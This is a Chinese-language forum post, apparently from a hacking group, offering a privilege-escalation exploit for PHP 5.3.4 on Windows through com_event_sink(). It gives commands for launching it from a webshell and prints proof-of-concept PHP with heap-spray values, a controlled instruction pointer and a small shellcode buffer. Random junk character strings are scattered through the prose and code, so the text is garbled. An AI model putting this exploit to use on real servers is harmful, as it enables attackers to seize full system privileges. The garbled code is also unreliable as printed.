PHP 5.3.4(WIN) COM_SINK权限提升漏洞

admin

PHP最新版已经更新至5.4.x，不过中国大陆尚处于在5.2.x和5.3.x更替的阶段。存在漏洞的php存在于5.3.x版本中
/ D7 _. T, Z! Q: P* @* ^
3 v9 `& U! ~) [+ c# W2 ~" X测试方法如下：cmd /c x:\php\php.exe x:\test.php
0 T9 B/ I3 P7 t/ g; k! U
1 w& k4 J% r: ?; D" c下载php程序至本地，然后使用php.exe解析php即可。Webshell上面使用php的exec等函数执行，或者使用Wscript.shell调用cmd.exe然后 /c x:\php\php.exe x:\xxxx\test.php
) C- F( ~4 p6 G+ S$ ]这里是两个测试的截图：
* Q+ \# d  }9 L2 g7 s5 ]8 [1 ]6 i


  R! K* [# _3 M- A# y
" K1 @0 e, P6 C
成功利用此漏洞的攻击者将获得系统的最高权限

( Y4 _7 r* W) ^5 y; v7 ]. n6 V: D( N


+ S# H2 M" }* N. o
关于漏洞分析稍后附上。一下是PoC代码：
. l* }) Z3 p3 y' M9 M# ]
/ r9 B6 `# V; o( v2 V+ ?7 ?: X7 W<?php
- p+ r* ]# l# c0 ^//PHP 5.3.4(Win版) com_event_sink()模型权限提升漏洞
//$eip ="\x44\x43\x42\x41";
5 h3 [0 ~4 l' w7 l) A% a" ~$eip= "\x4b\xe8\x57\x78";
$eax ="\x80\x01\x8d\x04";
$deodrant="";
' w$ q* Q$ A2 z( @8 |- z3 B$axespray = str_repeat($eip.$eax,0x80);
//048d0190
! e  k$ [& H# X8 [echo strlen($axespray);
echo "PHP 5.3.4(WIN) COM_SINK Privilege Escalation\n";
echo "Silic Group Hacker Army - BlackBap.Org";
, E9 w8 P: ?' D; w( M//19200 ==4B32 4b00
for($axeeffect=0;$axeeffect<0x4B32;$axeeffect++){$deodrant.=$axespray;}
$terminate = "T";
( ^$ `2 J& z( t) p/ s2 c+ r! k$u[] =$deodrant;
- B0 w& f, F$ ]$ i' n0 H. ^0 \$r[] =$deodrant.$terminate;
# l! A3 e+ h; l) N8 n. R$a[] =$deodrant.$terminate;
$s[] =$deodrant.$terminate;
//$vVar = new VARIANT(0x048d0038+$offset);        这里是可控可改的
# F+ W* N# H+ Z6 y4 _9 i# F$vVar = new VARIANT(0x048d0000+180);
- b# a# \: E5 ~- l" v7 D. _//弹窗代码(Shellcode)
$buffer = "\x90\x90\x90"."\xB9\x38\xDD\x82\x7C\x33\xC0\xBB"."\xD8\x0A\x86\x7C\x51\x50\xFF\xd3";
& v# H, x$ z5 K5 P6 [4 W$var2 = new VARIANT(0x41414242);
com_event_sink($vVar,$var2,$buffer);
$ j7 y  e; M6 s# |2 m?>
0 d6 M* |6 G1 G